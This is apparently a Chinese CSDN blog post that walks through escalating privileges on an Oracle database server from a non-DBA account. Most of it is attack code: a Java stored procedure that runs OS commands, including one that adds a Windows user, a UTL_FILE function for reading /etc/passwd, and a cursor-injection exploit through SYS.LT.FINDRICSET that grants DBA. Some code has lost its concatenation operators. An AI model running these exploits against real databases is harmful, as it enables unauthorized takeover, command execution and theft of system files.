oracle的获取权限,连接Oracle服务器后怎么获取权限

博客内容描述了在无法获得DBA权限的Oracle服务器上,通过创建函数和利用UTL库尝试权限提升的过程,包括试图创建Java扩展执行命令和使用游标注射技术。最终成功获取权限并能读取文件,强调了Oracle服务器安全防护的重要性。
摘要由CSDN通过智能技术生成

连接上oracle服务器,此时发现:      1.连接后不是dba权限     2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限     3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。     幸运的是,     运行     create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;     成功!这个用户具有create proceduce权限。     此时马上想到创建java扩展执行命令:     create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+" ";myReader.close();return str;} catch (Exception e){return e.toString();}}}     begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<>', 'execute' );end;     create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'     select * from all_objects where object_name like '%LINX%'     grant all on LinxRunCMD to public     select LinxRunCMD('cmd /c net user linx /add') from dual     但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!     还好,我们还有UTL库可以利用:     create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is     fHandler UTL_FILE.FILE_TYPE;     buf varchar2(4000);     output varchar2(8000);     BEGIN     fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');     loop     begin     utl_file.get_line(fHandler,buf);     DBMS_OUTPUT.PUT_LINE('Cursor: 'buf);     exception     when no_data_found then exit;     end;     output := outputbufchr(10);     end loop;     UTL_FILE.FCLOSE(fHandler);     return output;     END;     UTL_FILE_DIR需要先用:     CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';     指定目。但运行后发现没有权限。只好想办法提权 防黑网。     ***************游标注射***************     老外写了N个pdf介绍这技术,我精简了代码:     DECLARE     MYC NUMBER;     BEGIN     MYC := DBMS_SQL.OPEN_CURSOR;     DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);     DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     BEGIN SYS.LT.FINDRICSET('.''dbms_sql.execute( 'MYC' )'''')--','x'); END;     raise NO_DATA_FOUND;     EXCEPTION     WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);     END;     运行后重新连接就有dba权限了,简单吧......     现在可以读取文件了:     CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';     select LinxUTLReadfile('passwd') from dual     后面就简单了,不写了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值